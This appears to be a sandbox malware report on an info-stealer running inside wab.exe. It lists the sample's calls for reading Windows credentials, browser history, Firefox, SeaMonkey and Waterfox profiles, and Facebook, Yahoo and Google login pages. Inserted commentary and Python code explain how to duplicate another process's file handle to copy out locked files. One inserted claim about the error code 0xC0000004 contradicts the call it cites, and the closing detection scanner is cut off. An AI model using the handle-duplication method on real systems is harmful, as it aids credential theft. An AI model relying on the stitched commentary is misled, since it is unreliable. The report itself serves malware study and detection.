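SAMPLE_BUFFER = build_buffer(SAMPLE_ENTRIES)

if __name__ == "__main__":
    table = parse_system_handle_information(SAMPLE_BUFFER)
    for e in find_aliases(table, my_pid=1234, my_handle=0x0F4):
        print(f"pid {e.pid} handle {e.handle:#x} object {e.object:#010x} access {e.access:#010x}")
```

On a live system the buffer comes from NtQuerySystemInformation(0x10) called in a loop until it stops returning STATUS_INFO_LENGTH_MISMATCH (0xC0000004, the value visible as the first argument of the FindCloseChangeNotification call in the subcall above), and the duplicated handle is then mapped read-only and written out exactly as the report's CreateFileMappingW / MapViewOfFile / WriteFile sequence shows.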

                      Control-flow Graph

                      Executed / not-executed graph for 00413F4F-00413FA5 not reproduced (node list omitted; the calls it shows are listed under APIs below).
                      APIs
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                      • API String ID: 2941347001-70141382
                      • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                      • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                      • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                      • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                      Control-flow Graph

                      Executed / not-executed graph for 004466F4-004468DD not reproduced (node list omitted; the calls it shows are listed under APIs below).
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                      • String ID:
                      • API String ID: 2827331108-0
                      • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                      • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                      • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                      • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                      APIs
                      • memset.MSVCRT ref: 0040C298
                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                      • wcschr.MSVCRT ref: 0040C324
                      • wcschr.MSVCRT ref: 0040C344
                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                      • GetLastError.KERNEL32 ref: 0040C373
                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                      • String ID: visited:
                      • API String ID: 1157525455-1702587658
                      • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                      • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                      • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                      • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

Control-flow Graph (rendered graph not reproduced): basic blocks 40e175-40e2a8, entry at 40e175; calls memset, ??3@YAXPAX@Z and _snwprintf plus the internal routines 40695d, 406b90, 4069a3, 406e8f, 406b53, 40dd50, 40742e, 40aae3, 40a8d0 and 40aa04.
                      APIs
                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                      • memset.MSVCRT ref: 0040E1BD
                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                        • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                        • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                      • _snwprintf.MSVCRT ref: 0040E257
                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                        • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                      • String ID: $ContainerId$Container_%I64d$Containers$Name
                      • API String ID: 3883404497-2982631422
                      • Opcode ID: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                      • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                      • Opcode Fuzzy Hash: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                      • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                      APIs
                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                        • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                      • memset.MSVCRT ref: 0040BC75
                      • memset.MSVCRT ref: 0040BC8C
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                      • memcmp.MSVCRT ref: 0040BCD6
                      • memcpy.MSVCRT ref: 0040BD2B
                      • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                      • String ID:
                      • API String ID: 509814883-3916222277
                      • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                      • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                      • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                      • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

Control-flow Graph (rendered graph not reproduced): basic blocks 41837f-41851d, entry at 41837f; opens the target with either CreateFileW or CreateFileA, then on the GetLastError path frees the buffer with ??3@YAXPAX@Z and either calls 444706 or re-enters 41837f recursively; the success path calls memset and 418758 before freeing the buffer.
                      APIs
                      • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                      • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                      • GetLastError.KERNEL32 ref: 0041847E
                      • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: CreateFile$??3@ErrorLast
                      • String ID: |A
                      • API String ID: 1407640353-1717621600
                      • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                      • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                      • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                      • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                      • String ID: r!A
                      • API String ID: 2791114272-628097481
                      • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                      • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                      • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                      • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                      APIs
                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                        • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                      • _wcslwr.MSVCRT ref: 0040C817
                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                      • wcslen.MSVCRT ref: 0040C82C
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                      • API String ID: 62308376-4196376884
                      • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                      • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                      • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                      • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                      APIs
                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                      • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                      • wcslen.MSVCRT ref: 0040BE06
                      • _wcsncoll.MSVCRT ref: 0040BE38
                      • memset.MSVCRT ref: 0040BE91
                      • memcpy.MSVCRT ref: 0040BEB2
                      • _wcsnicmp.MSVCRT ref: 0040BEFC
                      • wcschr.MSVCRT ref: 0040BF24
                      • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                      • String ID:
                      • API String ID: 3191383707-0
                      • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                      • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                      • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                      • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                      APIs
                      • memset.MSVCRT ref: 00403CBF
                      • memset.MSVCRT ref: 00403CD4
                      • memset.MSVCRT ref: 00403CE9
                      • memset.MSVCRT ref: 00403CFE
                      • memset.MSVCRT ref: 00403D13
                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                      • memset.MSVCRT ref: 00403DDA
                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                      • String ID: Waterfox$Waterfox\Profiles
                      • API String ID: 3527940856-11920434
                      • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                      • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                      • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                      • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                      APIs
                      • memset.MSVCRT ref: 00403E50
                      • memset.MSVCRT ref: 00403E65
                      • memset.MSVCRT ref: 00403E7A
                      • memset.MSVCRT ref: 00403E8F
                      • memset.MSVCRT ref: 00403EA4
                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                      • memset.MSVCRT ref: 00403F6B
                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                      • API String ID: 3527940856-2068335096
                      • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                      • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                      • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                      • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                      APIs
                      • memset.MSVCRT ref: 00403FE1
                      • memset.MSVCRT ref: 00403FF6
                      • memset.MSVCRT ref: 0040400B
                      • memset.MSVCRT ref: 00404020
                      • memset.MSVCRT ref: 00404035
                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                      • memset.MSVCRT ref: 004040FC
                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                      • API String ID: 3527940856-3369679110
                      • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                      • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                      • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                      • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                      • API String ID: 3510742995-2641926074
                      • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                      • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                      • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                      • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                      APIs
                        • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                      • memset.MSVCRT ref: 004033B7
                      • memcpy.MSVCRT ref: 004033D0
                      • wcscmp.MSVCRT ref: 004033FC
                      • _wcsicmp.MSVCRT ref: 00403439
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                      • String ID: $0.@
                      • API String ID: 3030842498-1896041820
                      • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                      • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                      • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                      • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                      APIs
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                      • String ID:
                      • API String ID: 2941347001-0
                      • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                      • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                      • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                      • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                      APIs
                      • memset.MSVCRT ref: 00403C09
                      • memset.MSVCRT ref: 00403C1E
                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                      • wcscat.MSVCRT ref: 00403C47
                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                      • wcscat.MSVCRT ref: 00403C70
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memsetwcscat$Closewcscpywcslen
                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                      • API String ID: 3249829328-1174173950
                      • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                      • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                      • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                      • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
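The API listings and string identifiers in the function blocks above (FindFirstUrlCacheEntryW filtered on "visited:", CredEnumerateW followed by _wcsnicmp/wcschr parsing, the Mozilla\Firefox, Mozilla\SeaMonkey, Waterfox and Mozilla\Profiles paths, the facebook/yahoo/google login URLs, the "Container_%I64d" key format and the embedded SQLite strings such as "no such vfs: %s") are the fingerprints of the credential-recovery code running inside the injected wab.exe image. The Python script below is an added example, not part of the Joe Sandbox report or of the analysed sample; it scans a memory dump or PE file for exactly those markers, encoding the wide-string markers as UTF-16LE because the wcs* and ...W APIs listed above operate on wide characters, and applies a decision rule of my own (at least one credential API name plus at least two browser strings) that the report does not state. The two input blobs are constructed inline for the demonstration and are not real dumps.

```python
"""Scan a memory dump or PE image for the credential-harvesting markers listed in the report."""
import sys
from typing import Dict, List, Tuple

# Wide strings from the "String ID" lines above. The wcs*/…W APIs that use them
# take UTF-16LE text, so the search encodes them that way.
WIDE_MARKERS = [
    "visited:",                                   # FindFirstUrlCacheEntryW prefix
    "Container_%I64d",                            # _snwprintf key format
    "Mozilla\\Firefox\\Profiles",
    "Mozilla\\SeaMonkey\\Profiles",
    "Waterfox\\Profiles",
    "Mozilla\\Profiles",
    "http://www.facebook.com/",
    "https://login.yahoo.com/config/login",
    "https://www.google.com/accounts/servicelogin",
]
# Narrow strings from the embedded SQLite engine (used to read browser databases).
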